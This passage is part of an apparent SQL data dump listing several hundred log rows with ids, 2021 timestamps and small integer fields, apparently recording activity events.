(48, '2021-06-13 07:07:31', 1, 2060, 0, 1, 1),
(49, '2021-06-13 07:09:32', 1, 2063, 0, 1, 1),
(50, '2021-06-13 07:14:46', 1, 2058, 0, 1, 1),
(51, '2021-06-13 07:24:02', 1, 2055, 0, 1, 1),
(52, '2021-06-13 07:40:22', 1, 2061, 0, 1, 1),
(53, '2021-06-13 07:49:23', 1, 2062, 0, 1, 1),
(54, '2021-06-13 08:06:32', 1, 2054, 0, 1, 1),
(55, '2021-06-13 08:10:04', 1, 2059, 0, 1, 1),
(56, '2021-06-13 08:13:07', 1, 2064, 0, 1, 1),
(57, '2021-06-13 08:26:54', 1, 2054, 0, 1, 1),
(58, '2021-06-13 17:46:20', 1, 2064, 0, 1, 1),
(59, '2021-06-13 20:57:46', 1, 2055, 0, 1, 1),
(60, '2021-06-13 21:00:04', 1, 2063, 0, 1, 1),
(61, '2021-06-13 21:02:19', 1, 2062, 0, 1, 1),
(62, '2021-06-13 21:03:53', 1, 2060, 0, 1, 1),
(63, '2021-06-13 21:06:02', 1, 2059, 0, 1, 1),
(64, '2021-06-13 21:08:26', 1, 2061, 0, 1, 1),
(65, '2021-06-14 00:57:58', 1, 2058, 0, 1, 1),
(66, '2021-06-14 03:57:11', 1, 2060, 0, 1, 1),
(67, '2021-06-14 03:59:59', 1, 2063, 0, 1, 1),
(68, '2021-06-14 04:06:41', 1, 2058, 0, 1, 1),
(69, '2021-06-14 04:18:16', 1, 2055, 0, 1, 1),
(70, '2021-06-14 04:37:13', 1, 2061, 0, 1, 1),
(71, '2021-06-14 04:47:47', 1, 2062, 0, 1, 1),
(72, '2021-06-14 05:06:54', 1, 2054, 0, 1, 1),
(73, '2021-06-14 05:10:58', 1, 2059, 0, 1, 1),
(74, '2021-06-14 05:14:18', 1, 2064, 0, 1, 1),
(75, '2021-06-14 11:30:42', 1, 2055, 0, 1, 1),
(76, '2021-06-15 12:31:25', 1, 2063, 0, 1, 1),
(77, '2021-06-15 12:31:32', 4, 2063, 56, 1, 1),
(78, '2021-06-15 14:52:42', 1, 2061, 0, 1, 1),
(79, '2021-06-15 15:21:23', 1, 2058, 0, 1, 1),
(80, '2021-06-15 15:49:41', 1, 2064, 57, 1, 1),
(81, '2021-06-15 16:34:43', 1, 2063, 0, 1, 1),
(82, '2021-06-15 16:40:48', 1, 2060, 0, 1, 1),
(83, '2021-06-15 16:42:38', 1, 2063, 0, 1, 1),
(84, '2021-06-15 16:47:13', 1, 2058, 0, 1, 1),
(85, '2021-06-15 16:56:05', 1, 2055, 0, 1, 1),
(86, '2021-06-15 17:11:32', 1, 2061, 0, 1, 1),
(87, '2021-06-15 17:20:03', 1, 2062, 0, 1, 1),
(88, '2021-06-15 17:36:09', 1, 2054, 0, 1, 1),
(89, '2021-06-15 17:39:27', 1, 2059, 0, 1, 1),
(90, '2021-06-15 17:42:17', 1, 2064, 0, 1, 1),
(91, '2021-06-16 00:56:05', 1, 2054, 0, 1, 1),
(92, '2021-06-16 02:47:44', 1, 2062, 0, 1, 1),
(93, '2021-06-16 06:45:18', 1, 2062, 0, 1, 1),
(94, '2021-06-16 06:45:35', 4, 2062, 59, 1, 1),
(95, '2021-06-16 11:25:18', 1, 2060, 0, 1, 1),
(96, '2021-06-16 12:03:32', 1, 2062, 61, 1, 1),
(97, '2021-06-16 12:03:49', 4, 2062, 61, 1, 1),
(98, '2021-06-16 12:04:00', 1, 2062, 61, 1, 1),
(99, '2021-06-16 12:04:19', 4, 2058, 61, 1, 1),
(100, '2021-06-16 12:04:36', 1, 2062, 61, 1, 1),
(101, '2021-06-16 12:04:41', 3, 2062, 61, 1, 1),
(102, '2021-06-16 12:04:42', 1, 2062, 61, 1, 1),
(103, '2021-06-16 19:14:21', 1, 2064, 0, 1, 1),
(104, '2021-06-16 19:17:01', 1, 2059, 0, 1, 1),
(105, '2021-06-17 14:55:04', 1, 2060, 0, 1, 1),
(106, '2021-06-17 14:57:00', 1, 2063, 0, 1, 1),
(107, '2021-06-17 15:02:35', 1, 2058, 0, 1, 1),
(108, '2021-06-17 15:12:28', 1, 2055, 0, 1, 1),
(109, '2021-06-17 15:27:45', 1, 2061, 0, 1, 1),
(110, '2021-06-17 15:36:05', 1, 2062, 0, 1, 1),
(111, '2021-06-17 15:51:52', 1, 2054, 0, 1, 1),
(112, '2021-06-17 15:55:21', 1, 2059, 0, 1, 1),
(113, '2021-06-17 16:09:08', 1, 2060, 0, 1, 1),
(114, '2021-06-17 16:10:52', 1, 2063, 0, 1, 1),
(115, '2021-06-17 16:15:47', 1, 2058, 0, 1, 1),
(116, '2021-06-17 16:24:30', 1, 2055, 0, 1, 1),
(117, '2021-06-17 16:38:34', 1, 2061, 0, 1, 1),
(118, '2021-06-17 16:46:18', 1, 2062, 0, 1, 1),
(119, '2021-06-17 17:01:08', 1, 2054, 0, 1, 1),
(120, '2021-06-17 17:04:26', 1, 2059, 0, 1, 1),
(121, '2021-06-17 17:07:05', 1, 2064, 0, 1, 1),
(122, '2021-06-18 09:39:33', 1, 2060, 0, 1, 1),
(123, '2021-06-18 13:12:01', 1, 2060, 0, 1, 1),
(124, '2021-06-18 13:14:00', 1, 2063, 0, 1, 1),
(125, '2021-06-18 13:19:34', 1, 2058, 0, 1, 1),
(126, '2021-06-18 13:29:51', 1, 2055, 0, 1, 1),
(127, '2021-06-18 13:46:44', 1, 2061, 0, 1, 1),
(128, '2021-06-18 13:55:39', 1, 2062, 0, 1, 1),
(129, '2021-06-18 14:12:31', 1, 2054, 0, 1, 1),
(130, '2021-06-18 14:16:03', 1, 2059, 0, 1, 1),
(131, '2021-06-18 14:18:59', 1, 2064, 0, 1, 1),
(132, '2021-06-18 14:35:27', 1, 2060, 0, 1, 1),
(133, '2021-06-18 16:09:12', 1, 2060, 0, 1, 1),
(134, '2021-06-18 16:11:03', 1, 2063, 0, 1, 1),
(135, '2021-06-18 16:15:58', 1, 2058, 0, 1, 1),
(136, '2021-06-18 16:24:31', 1, 2055, 0, 1, 1),
(137, '2021-06-18 16:39:04', 1, 2061, 0, 1, 1),
(138, '2021-06-18 16:46:55', 1, 2062, 0, 1, 1),
(139, '2021-06-18 17:02:01', 1, 2054, 0, 1, 1),
(140, '2021-06-18 17:05:16', 1, 2059, 0, 1, 1),
(141, '2021-06-18 17:08:02', 1, 2064, 0, 1, 1),
(142, '2021-06-18 20:56:02', 1, 2060, 0, 1, 1),
(143, '2021-06-18 20:58:01', 1, 2063, 0, 1, 1),
(144, '2021-06-18 21:03:21', 1, 2058, 0, 1, 1),
(145, '2021-06-18 21:12:32', 1, 2055, 0, 1, 1),
(146, '2021-06-18 21:27:57', 1, 2061, 0, 1, 1),
(147, '2021-06-18 21:35:45', 1, 2062, 0, 1, 1),
(148, '2021-06-18 21:50:56', 1, 2054, 0, 1, 1),
(149, '2021-06-18 21:54:17', 1, 2059, 0, 1, 1),
(150, '2021-06-18 21:56:58', 1, 2064, 0, 1, 1),
(151, '2021-06-19 16:58:48', 1, 2060, 0, 1, 1),
(152, '2021-06-19 17:00:33', 1, 2063, 0, 1, 1),
(153, '2021-06-19 17:04:55', 1, 2058, 0, 1, 1),
(154, '2021-06-19 17:13:02', 1, 2055, 0, 1, 1),
(155, '2021-06-19 17:26:07', 1, 2061, 0, 1, 1),
(156, '2021-06-19 17:32:44', 1, 2062, 0, 1, 1),
(157, '2021-06-19 17:45:20', 1, 2054, 0, 1, 1),
(158, '2021-06-19 17:48:03', 1, 2059, 0, 1, 1),
(159, '2021-06-19 17:50:20', 1, 2064, 0, 1, 1),
(160, '2021-06-20 12:47:20', 1, 2060, 0, 1, 1),
(161, '2021-06-20 12:49:37', 1, 2063, 0, 1, 1),
(162, '2021-06-20 12:54:56', 1, 2058, 0, 1, 1),
(163, '2021-06-20 13:04:23', 1, 2055, 0, 1, 1),
(164, '2021-06-20 13:19:39', 1, 2061, 0, 1, 1),
(165, '2021-06-20 13:27:35', 1, 2062, 0, 1, 1),
(166, '2021-06-20 13:43:02', 1, 2054, 0, 1, 1),
(167, '2021-06-20 13:46:36', 1, 2059, 0, 1, 1),
(168, '2021-06-20 13:49:25', 1, 2064, 0, 1, 1),
(169, '2021-06-20 16:40:01', 1, 2060, 0, 1, 1),
(170, '2021-06-20 16:41:59', 1, 2063, 0, 1, 1),
(171, '2021-06-20 16:47:05', 1, 2058, 0, 1, 1),
(172, '2021-06-20 16:55:55', 1, 2055, 0, 1, 1),
(173, '2021-06-20 18:07:31', 1, 2060, 0, 1, 1),
(174, '2021-06-20 18:09:25', 1, 2063, 0, 1, 1),
(175, '2021-06-20 18:14:21', 1, 2058, 0, 1, 1),
(176, '2021-06-20 18:23:56', 1, 2055, 0, 1, 1),
(177, '2021-06-20 18:37:29', 1, 2054, 0, 1, 1),
(178, '2021-06-20 18:39:04', 1, 2061, 0, 1, 1),
(179, '2021-06-20 18:46:44', 1, 2062, 0, 1, 1),
(180, '2021-06-20 19:02:27', 1, 2054, 0, 1, 1),
(181, '2021-06-20 19:05:17', 1, 2059, 0, 1, 1),
(182, '2021-06-20 19:07:58', 1, 2064, 0, 1, 1),
(183, '2021-06-21 04:58:31', 1, 2055, 0, 1, 1),
(184, '2021-06-21 05:03:08', 1, 2063, 0, 1, 1),
(185, '2021-06-21 05:11:38', 1, 2062, 0, 1, 1),
(186, '2021-06-21 05:15:54', 1, 2060, 0, 1, 1),
(187, '2021-06-21 05:20:03', 1, 2061, 0, 1, 1),
(188, '2021-06-21 05:24:03', 1, 2059, 0, 1, 1),
(189, '2021-06-21 15:41:31', 1, 2064, 0, 1, 1),
(190, '2021-06-21 15:44:46', 1, 2058, 0, 1, 1),
(191, '2021-06-22 02:55:08', 1, 2055, 0, 1, 1),
(192, '2021-06-23 06:11:29', 1, 2061, 0, 1, 1),
(193, '2021-06-23 06:17:54', 1, 2058, 0, 1, 1),
(194, '2021-06-23 06:19:55', 1, 2063, 0, 1, 1),
(195, '2021-06-23 07:42:14', 1, 2062, 0, 1, 1),
(196, '2021-06-23 17:58:07', 1, 2054, 0, 1, 1),
(197, '2021-06-23 18:49:24', 1, 2062, 0, 1, 1),
(198, '2021-06-24 01:53:43', 1, 2060, 0, 1, 1),
(199, '2021-06-24 09:40:08', 1, 2060, 0, 1, 1),
(200, '2021-06-24 09:42:00', 1, 2063, 0, 1, 1),
(201, '2021-06-24 09:46:24', 1, 2058, 0, 1, 1),
(202, '2021-06-24 09:54:34', 1, 2055, 0, 1, 1),
(203, '2021-06-24 10:09:18', 1, 2061, 0, 1, 1),
(204, '2021-06-24 10:16:56', 1, 2062, 0, 1, 1),
(205, '2021-06-24 10:31:21', 1, 2054, 0, 1, 1),
(206, '2021-06-24 10:34:04', 1, 2059, 0, 1, 1),
(207, '2021-06-24 10:36:32', 1, 2064, 0, 1, 1),
(208, '2021-06-24 21:10:26', 1, 2053, 0, 1, 1),
(209, '2021-06-24 22:27:30', 1, 2060, 0, 1, 1),
(210, '2021-06-24 22:29:08', 1, 2063, 0, 1, 1),
(211, '2021-06-24 22:33:14', 1, 2058, 0, 1, 1),
(212, '2021-06-24 22:41:06', 1, 2055, 0, 1, 1),
(213, '2021-06-24 22:53:59', 1, 2061, 0, 1, 1),
(214, '2021-06-24 23:00:37', 1, 2062, 0, 1, 1),
(215, '2021-06-24 23:11:47', 1, 2064, 0, 1, 1),
(216, '2021-06-24 23:13:14', 1, 2054, 0, 1, 1),
(217, '2021-06-24 23:15:40', 1, 2059, 0, 1, 1),
(218, '2021-06-24 23:17:40', 1, 2064, 0, 1, 1),
(219, '2021-06-25 06:49:53', 1, 2059, 0, 1, 1),
(220, '2021-06-25 09:02:28', 1, 2060, 0, 1, 1),
(221, '2021-06-25 09:04:36', 1, 2063, 0, 1, 1),
(222, '2021-06-25 09:09:39', 1, 2058, 0, 1, 1),
(223, '2021-06-25 09:18:55', 1, 2055, 0, 1, 1),
(224, '2021-06-25 09:35:07', 1, 2061, 0, 1, 1),
(225, '2021-06-25 09:43:20', 1, 2062, 0, 1, 1),
(226, '2021-06-25 09:58:59', 1, 2054, 0, 1, 1),
(227, '2021-06-25 10:01:55', 1, 2059, 0, 1, 1),
(228, '2021-06-25 10:04:34', 1, 2064, 0, 1, 1),
(229, '2021-06-25 15:31:55', 1, 2053, 0, 1, 1),
(230, '2021-06-25 17:11:10', 1, 2060, 0, 1, 1),
(231, '2021-06-25 17:12:59', 1, 2063, 0, 1, 1),
(232, '2021-06-25 17:17:30', 1, 2058, 0, 1, 1),
(233, '2021-06-25 17:25:43', 1, 2055, 0, 1, 1),
(234, '2021-06-25 17:39:57', 1, 2061, 0, 1, 1),
(235, '2021-06-25 17:47:45', 1, 2062, 0, 1, 1),
(236, '2021-06-25 18:02:37', 1, 2054, 0, 1, 1),
(237, '2021-06-25 18:05:24', 1, 2059, 0, 1, 1),
(238, '2021-06-25 18:07:58', 1, 2064, 0, 1, 1),
(239, '2021-06-26 05:17:35', 1, 2054, 0, 1, 1),
(240, '2021-06-26 20:27:28', 1, 2060, 0, 1, 1),
(241, '2021-06-26 20:29:09', 1, 2063, 0, 1, 1),
(242, '2021-06-26 20:33:21', 1, 2058, 0, 1, 1),
(243, '2021-06-26 20:41:06', 1, 2055, 0, 1, 1),
(244, '2021-06-26 20:54:25', 1, 2061, 0, 1, 1),
(245, '2021-06-26 21:01:33', 1, 2062, 0, 1, 1),
(246, '2021-06-26 21:14:36', 1, 2054, 0, 1, 1),
(247, '2021-06-26 21:17:08', 1, 2059, 0, 1, 1),
(248, '2021-06-26 21:19:23', 1, 2064, 0, 1, 1),
(249, '2021-06-27 06:40:37', 1, 2060, 0, 1, 1),
(250, '2021-06-27 06:42:50', 1, 2063, 0, 1, 1),
(251, '2021-06-27 06:48:36', 1, 2058, 0, 1, 1),
(252, '2021-06-27 06:59:10', 1, 2055, 0, 1, 1),
(253, '2021-06-27 07:15:58', 1, 2061, 0, 1, 1),
(254, '2021-06-27 07:24:39', 1, 2062, 0, 1, 1),
(255, '2021-06-27 07:42:26', 1, 2054, 0, 1, 1),
(256, '2021-06-27 07:46:18', 1, 2059, 0, 1, 1),
(257, '2021-06-27 07:49:29', 1, 2064, 0, 1, 1),
(258, '2021-06-27 11:44:59', 1, 2064, 64, 1, 1),
(259, '2021-06-27 11:45:17', 1, 2064, 64, 1, 1),
(260, '2021-06-27 16:25:37', 1, 2060, 0, 1, 1),
(261, '2021-06-27 16:27:42', 1, 2063, 0, 1, 1),
(262, '2021-06-27 16:32:33', 1, 2058, 0, 1, 1),
(263, '2021-06-27 16:41:25', 1, 2055, 0, 1, 1),
(264, '2021-06-27 16:56:23', 1, 2061, 0, 1, 1),
(265, '2021-06-27 17:04:04', 1, 2062, 0, 1, 1),
(266, '2021-06-27 20:43:49', 1, 2060, 0, 1, 1),
(267, '2021-06-27 20:45:37', 1, 2063, 0, 1, 1),
(268, '2021-06-27 20:50:26', 1, 2058, 0, 1, 1),
(269, '2021-06-27 20:59:21', 1, 2055, 0, 1, 1),
(270, '2021-06-27 21:14:20', 1, 2061, 0, 1, 1),
(271, '2021-06-27 21:22:26', 1, 2062, 0, 1, 1),
(272, '2021-06-27 21:37:58', 1, 2054, 0, 1, 1),
(273, '2021-06-27 21:41:26', 1, 2059, 0, 1, 1),
(274, '2021-06-27 21:44:22', 1, 2064, 0, 1, 1),
(275, '2021-06-28 01:05:30', 1, 2064, 0, 1, 1),
(276, '2021-06-28 01:05:33', 1, 2063, 0, 1, 1),
(277, '2021-06-28 01:05:34', 1, 2062, 0, 1, 1),
(278, '2021-06-28 01:05:36', 1, 2061, 0, 1, 1),
(279, '2021-06-28 01:05:37', 1, 2060, 0, 1, 1),
(280, '2021-06-28 01:05:38', 1, 2055, 0, 1, 1),
(281, '2021-06-28 01:05:39', 1, 2054, 0, 1, 1),
(282, '2021-06-28 01:05:50', 1, 2058, 0, 1, 1),
(283, '2021-06-28 01:05:52', 1, 2059, 0, 1, 1),
(284, '2021-06-28 17:40:46', 1, 2054, 0, 1, 1),
(285, '2021-06-28 18:06:52', 1, 2060, 0, 1, 1),
(286, '2021-06-28 18:08:38', 1, 2063, 0, 1, 1),
(287, '2021-06-28 18:13:22', 1, 2058, 0, 1, 1),
(288, '2021-06-28 18:21:55', 1, 2055, 0, 1, 1),
(289, '2021-06-28 18:35:56', 1, 2061, 0, 1, 1),
(290, '2021-06-28 18:43:15', 1, 2062, 0, 1, 1),
(291, '2021-06-28 18:57:57', 1, 2054, 0, 1, 1),
(292, '2021-06-28 19:00:56', 1, 2059, 0, 1, 1),
(293, '2021-06-28 19:03:26', 1, 2064, 0, 1, 1),
(294, '2021-06-29 04:31:47', 1, 2055, 0, 1, 1),
(295, '2021-06-29 04:34:06', 1, 2063, 0, 1, 1),
(296, '2021-06-29 04:36:36', 1, 2062, 0, 1, 1),
(297, '2021-06-29 04:38:59', 1, 2061, 0, 1, 1),
(298, '2021-06-29 04:41:17', 1, 2060, 0, 1, 1),
(299, '2021-06-29 04:43:39', 1, 2059, 0, 1, 1),
(300, '2021-06-29 05:00:21', 1, 2058, 0, 1, 1),
(301, '2021-06-29 15:22:28', 1, 2055, 0, 1, 1),
(302, '2021-06-29 15:24:35', 1, 2058, 0, 1, 1),
(303, '2021-10-15 18:55:30', 1, 2061, 0, 1, 1),
(304, '2021-10-15 20:23:56', 1, 2064, 0, 1, 1),
(305, '2021-10-15 20:24:08', 1, 2063, 0, 1, 1),
(306, '2021-10-15 20:24:20', 1, 2062, 0, 1, 1),
(307, '2021-10-15 20:24:31', 1, 2061, 0, 1, 1),
(308, '2021-10-15 20:24:42', 1, 2060, 0, 1, 1),
(309, '2021-10-15 20:24:54', 1, 2059, 0, 1, 1),
(310, '2021-10-15 20:25:06', 1, 2058, 0, 1, 1),
(311, '2021-10-15 20:25:19', 1, 2055, 0, 1, 1),
(312, '2021-10-15 20:25:31', 1, 2054, 0, 1, 1),
(313, '2021-10-15 20:40:59', 1, 2053, 0, 1, 1),
(314, '2021-10-15 22:17:02', 1, 2054, 0, 1, 1),
(315, '2021-10-15 22:17:05', 1, 2060, 0, 1, 1),
(316, '2021-10-15 22:17:07', 1, 2061, 0, 1, 1),
(317, '2021-10-15 22:17:10', 1, 2059, 0, 1, 1),
(318, '2021-10-15 22:17:13', 1, 2064, 0, 1, 1),
(319, '2021-10-15 22:17:15', 1, 2062, 0, 1, 1),
(320, '2021-10-15 22:17:18', 1, 2055, 0, 1, 1),
(321, '2021-10-15 22:17:20', 1, 2063, 0, 1, 1),
(322, '2021-10-15 22:17:23', 1, 2058, 0, 1, 1),
(323, '2021-10-16 12:58:49', 1, 2058, 0, 1, 1),
(324, '2021-10-16 22:09:33', 1, 2063, 0, 1, 1),
(325, '2021-10-17 08:02:31', 1, 2055, 0, 1, 1),
(326, '2021-10-17 18:16:03', 1, 2063, 0, 1, 1),
(327, '2021-10-17 20:36:17', 1, 2061, 0, 1, 1),
(328, '2021-10-18 12:33:08', 1, 2059, 0, 1, 1),
(329, '2021-10-18 14:12:20', 1, 2063, 0, 1, 1),
(330, '2021-10-18 16:07:29', 1, 2061, 0, 1, 1),
(331, '2021-10-18 22:43:35', 1, 2058, 0, 1, 1),
(332, '2021-10-19 07:29:09', 1, 2063, 0, 1, 1),
(333, '2021-10-19 09:24:49', 1, 2061, 0, 1, 1),
(334, '2021-10-19 15:30:16', 1, 2063, 0, 1, 1),
(335, '2021-10-19 19:13:12', 1, 2058, 0, 1, 1),
(336, '2021-10-20 08:40:36', 1, 2063, 0, 1, 1),
(337, '2021-10-20 10:46:17', 1, 2054, 0, 1, 1),
(338, '2021-10-20 12:24:39', 1, 2058, 0, 1, 1),
(339, '2021-10-20 17:28:05', 1, 2061, 0, 1, 1),
(340, '2021-10-20 17:33:27', 1, 2061, 0, 1, 1),
(341, '2021-10-21 01:34:22', 1, 2064, 0, 1, 1),
(342, '2021-10-21 10:25:23', 1, 2063, 0, 1, 1),
(343, '2021-10-21 21:49:52', 1, 2060, 0, 1, 1),
(344, '2021-10-22 13:46:17', 1, 2054, 0, 1, 1),
(345, '2021-10-22 13:46:21', 1, 2055, 0, 1, 1),
(346, '2021-10-22 13:46:32', 1, 2064, 0, 1, 1),
(347, '2021-10-22 13:46:35', 1, 2063, 0, 1, 1),
(348, '2021-10-22 13:46:39', 1, 2062, 0, 1, 1),
(349, '2021-10-22 13:46:41', 1, 2060, 0, 1, 1),
(350, '2021-10-22 13:46:45', 1, 2059, 0, 1, 1),
(351, '2021-10-22 13:46:48', 1, 2061, 0, 1, 1),
(352, '2021-10-22 13:46:51', 1, 2058, 0, 1, 1),
(353, '2021-10-22 18:18:51', 1, 2053, 0, 1, 1),
(354, '2021-10-24 01:39:06', 1, 2064, 0, 1, 1),
(355, '2021-10-24 04:06:16', 1, 2063, 0, 1, 1),
(356, '2021-10-25 08:42:52', 1, 2063, 0, 1, 1),
(357, '2021-10-27 18:32:54', 1, 2058, 0, 1, 1),
(358, '2021-10-28 04:40:30', 1, 2058, 0, 1, 1),
(359, '2021-10-28 10:07:53', 1, 2064, 0, 1, 1),
(360, '2021-10-29 14:10:27', 1, 2062, 0, 1, 1),
(361, '2021-10-29 15:24:19', 1, 2064, 0, 1, 1),
(362, '2021-10-29 16:51:39', 1, 2055, 0, 1, 1),
(363, '2021-10-30 02:55:50', 1, 2061, 0, 1, 1),
(364, '2021-10-30 04:25:48', 1, 2061, 0, 1, 1),
(365, '2021-10-30 09:48:13', 1, 2060, 0, 1, 1),
(366, '2021-10-30 09:48:16', 1, 2063, 0, 1, 1),
(367, '2021-10-30 09:48:18', 1, 2058, 0, 1, 1),
(368, '2021-10-30 09:48:25', 1, 2055, 0, 1, 1),
(369, '2021-10-30 09:48:33', 1, 2061, 0, 1, 1),
(370, '2021-10-30 09:48:42', 1, 2062, 0, 1, 1),
(371, '2021-10-30 09:48:51', 1, 2054, 0, 1, 1),
(372, '2021-10-30 09:48:54', 1, 2059, 0, 1, 1),
(373, '2021-10-30 09:48:57', 1, 2064, 0, 1, 1),
(374, '2021-10-30 10:41:10', 1, 2060, 0, 1, 1),
(375, '2021-10-30 10:41:13', 1, 2063, 0, 1, 1),
(376, '2021-10-30 10:41:15', 1, 2058, 0, 1, 1),
(377, '2021-10-30 10:41:21', 1, 2055, 0, 1, 1),
(378, '2021-10-30 10:41:29', 1, 2061, 0, 1, 1),
(379, '2021-10-30 10:41:34', 1, 2062, 0, 1, 1),
(380, '2021-10-30 10:41:42', 1, 2054, 0, 1, 1),
(381, '2021-10-30 10:41:46', 1, 2059, 0, 1, 1),
(382, '2021-10-30 10:41:48', 1, 2064, 0, 1, 1),
(383, '2021-10-30 13:19:59', 1, 2061, 0, 1, 1),
(384, '2021-10-30 16:45:30', 1, 2060, 0, 1, 1),
(385, '2021-10-30 22:51:17', 1, 2064, 0, 1, 1),
(386, '2021-10-30 22:51:24', 1, 2058, 0, 1, 1),
(387, '2021-10-30 22:51:26', 1, 2059, 0, 1, 1),
(388, '2021-10-30 22:51:27', 1, 2060, 0, 1, 1),
(389, '2021-10-30 22:51:29', 1, 2061, 0, 1, 1),
(390, '2021-10-30 22:51:31', 1, 2062, 0, 1, 1),
(391, '2021-10-30 22:51:32', 1, 2063, 0, 1, 1),
(392, '2021-10-30 22:51:34', 1, 2055, 0, 1, 1),
(393, '2021-10-30 22:51:42', 1, 2054, 0, 1, 1),
(394, '2021-10-30 23:42:07', 1, 2061, 0, 1, 1),
(395, '2021-10-31 00:27:07', 1, 2061, 0, 1, 1),
(396, '2021-11-01 22:49:33', 1, 2059, 0, 1, 1),
(397, '2021-11-01 23:47:16', 1, 2063, 0, 1, 1),
(398, '2021-11-02 19:02:52', 1, 2058, 0, 1, 1),
(399, '2021-11-02 21:36:59', 1, 2058, 0, 1, 1),
(400, '2021-11-03 08:07:14', 1, 2064, 0, 1, 1),
(401, '2021-11-03 15:34:29', 1, 2054, 0, 1, 1),
(402, '2021-11-03 20:47:48', 1, 2061, 0, 1, 1),
(403, '2021-11-04 00:00:10', 1, 2054, 0, 1, 1),
(404, '2021-11-04 12:28:15', 1, 2061, 0, 1, 1),
(405, '2021-11-04 16:51:58', 1, 2055, 0, 1, 1),
(406, '2021-11-04 17:37:53', 1, 2061, 0, 1, 1),
(407, '2021-11-04 18:58:58', 1, 2059, 0, 1, 1),
(408, '2021-11-04 21:23:35', 1, 2061, 0, 1, 1),
(409, '2021-11-04 21:29:58', 1, 2060, 0, 1, 1),
(410, '2021-11-05 04:23:22', 1, 2061, 0, 1, 1),
(411, '2021-11-05 04:23:25', 1, 2058, 0, 1, 1),
(412, '2021-11-05 04:23:27', 1, 2054, 0, 1, 1),
(413, '2021-11-05 04:23:33', 1, 2060, 0, 1, 1),
(414, '2021-11-05 04:23:36', 1, 2059, 0, 1, 1),
(415, '2021-11-05 04:23:39', 1, 2062, 0, 1, 1),
(416, '2021-11-05 04:23:40', 1, 2055, 0, 1, 1),
(417, '2021-11-05 04:23:42', 1, 2064, 0, 1, 1),
(418, '2021-11-05 04:23:47', 1, 2063, 0, 1, 1),
(419, '2021-11-05 08:02:36', 1, 2061, 0, 1, 1),
(420, '2021-11-05 15:03:11', 1, 2061, 0, 1, 1),
(421, '2021-11-05 15:30:35', 1, 2064, 0, 1, 1),
(422, '2021-11-05 17:45:22', 1, 2061, 0, 1, 1),
(423, '2021-11-06 02:28:58', 1, 2061, 0, 1, 1),
(424, '2021-11-06 09:09:18', 1, 2064, 81, 1, 1),
(425, '2021-11-06 09:10:21', 1, 2064, 81, 1, 1),
(426, '2021-11-06 09:12:33', 1, 2064, 81, 1, 1),
(427, '2021-11-06 09:13:46', 1, 2064, 81, 1, 1),
(428, '2021-11-06 12:41:25', 1, 2061, 0, 1, 1),
(429, '2021-11-06 23:15:12', 1, 2061, 0, 1, 1),
(430, '2021-11-07 07:25:16', 1, 2061, 0, 1, 1),
(431, '2021-11-07 09:11:35', 1, 2058, 0, 1, 1),
(432, '2021-11-07 12:28:23', 1, 2062, 0, 1, 1),
(433, '2021-11-07 14:24:07', 1, 2054, 0, 1, 1),
(434, '2021-11-07 15:14:52', 1, 2061, 0, 1, 1),
(435, '2021-11-07 19:54:21', 1, 2058, 0, 1, 1),
(436, '2021-11-08 02:10:17', 1, 2061, 0, 1, 1),
(437, '2021-11-08 20:41:38', 1, 2058, 0, 1, 1),
(438, '2021-11-09 02:21:19', 1, 2060, 0, 1, 1),
(439, '2021-11-09 02:21:23', 1, 2063, 0, 1, 1),
(440, '2021-11-09 02:21:25', 1, 2058, 0, 1, 1),
(441, '2021-11-09 02:21:33', 1, 2055, 0, 1, 1),
(442, '2021-11-09 02:21:41', 1, 2061, 0, 1, 1),
(443, '2021-11-09 02:21:51', 1, 2062, 0, 1, 1),
(444, '2021-11-09 02:22:00', 1, 2054, 0, 1, 1),
(445, '2021-11-09 02:22:04', 1, 2059, 0, 1, 1),
(446, '2021-11-09 02:22:06', 1, 2064, 0, 1, 1),
(447, '2021-11-09 19:29:24', 1, 2064, 0, 1, 1),
(448, '2021-11-09 19:56:13', 1, 2058, 0, 1, 1),
(449, '2021-11-09 19:56:23', 1, 2064, 0, 1, 1),
(450, '2021-11-09 19:56:37', 1, 2062, 0, 1, 1),
(451, '2021-11-09 19:56:39', 1, 2055, 0, 1, 1),
(452, '2021-11-09 19:56:48', 1, 2059, 0, 1, 1),
(453, '2021-11-09 19:56:51', 1, 2063, 0, 1, 1),
(454, '2021-11-09 19:56:52', 1, 2061, 0, 1, 1),
(455, '2021-11-09 19:56:58', 1, 2060, 0, 1, 1),
(456, '2021-11-09 19:57:05', 1, 2054, 0, 1, 1),
(457, '2021-11-09 19:58:44', 1, 2058, 0, 1, 1),
(458, '2021-11-09 19:58:53', 1, 2064, 0, 1, 1),
(459, '2021-11-09 19:59:00', 1, 2062, 0, 1, 1),
(460, '2021-11-09 19:59:02', 1, 2055, 0, 1, 1),
(461, '2021-11-09 19:59:07', 1, 2059, 0, 1, 1),
(462, '2021-11-09 19:59:08', 1, 2063, 0, 1, 1),
(463, '2021-11-09 19:59:09', 1, 2061, 0, 1, 1),
(464, '2021-11-09 19:59:17', 1, 2060, 0, 1, 1),
(465, '2021-11-09 19:59:20', 1, 2054, 0, 1, 1),
(466, '2021-11-09 19:59:50', 1, 2053, 0, 1, 1),
(467, '2021-11-09 21:21:46', 1, 2055, 0, 1, 1),
(468, '2021-11-09 23:57:04', 1, 2055, 0, 1, 1),
(469, '2021-11-10 13:49:23', 1, 2058, 0, 1, 1),
(470, '2021-11-10 15:08:15', 1, 2059, 0, 1, 1),
(471, '2021-11-10 15:30:45', 1, 2059, 0, 1, 1),
(472, '2021-11-11 00:05:56', 1, 2064, 0, 1, 1),
(473, '2021-11-11 01:23:29', 1, 2053, 0, 1, 1),
(474, '2021-11-12 00:42:52', 1, 2061, 0, 1, 1),
(475, '2021-11-12 18:05:36', 1, 2061, 0, 1, 1),
(476, '2021-11-13 08:24:29', 1, 2061, 0, 1, 1),
(477, '2021-11-14 00:32:43', 1, 2061, 0, 1, 1),
(478, '2021-11-14 01:45:50', 1, 2058, 0, 1, 1),
(479, '2021-11-14 14:49:53', 1, 2064, 0, 1, 1),
(480, '2021-11-14 18:07:39', 1, 2058, 0, 1, 1),
(481, '2021-11-14 22:06:44', 1, 2064, 0, 1, 1),
(482, '2021-11-15 04:43:16', 1, 2060, 0, 1, 1),
(483, '2021-11-15 04:43:20', 1, 2063, 0, 1, 1),
(484, '2021-11-15 04:43:22', 1, 2058, 0, 1, 1),
(485, '2021-11-15 04:43:29', 1, 2055, 0, 1, 1),
(486, '2021-11-15 04:43:37', 1, 2061, 0, 1, 1),
(487, '2021-11-15 04:43:48', 1, 2062, 0, 1, 1),
(488, '2021-11-15 04:43:56', 1, 2054, 0, 1, 1),
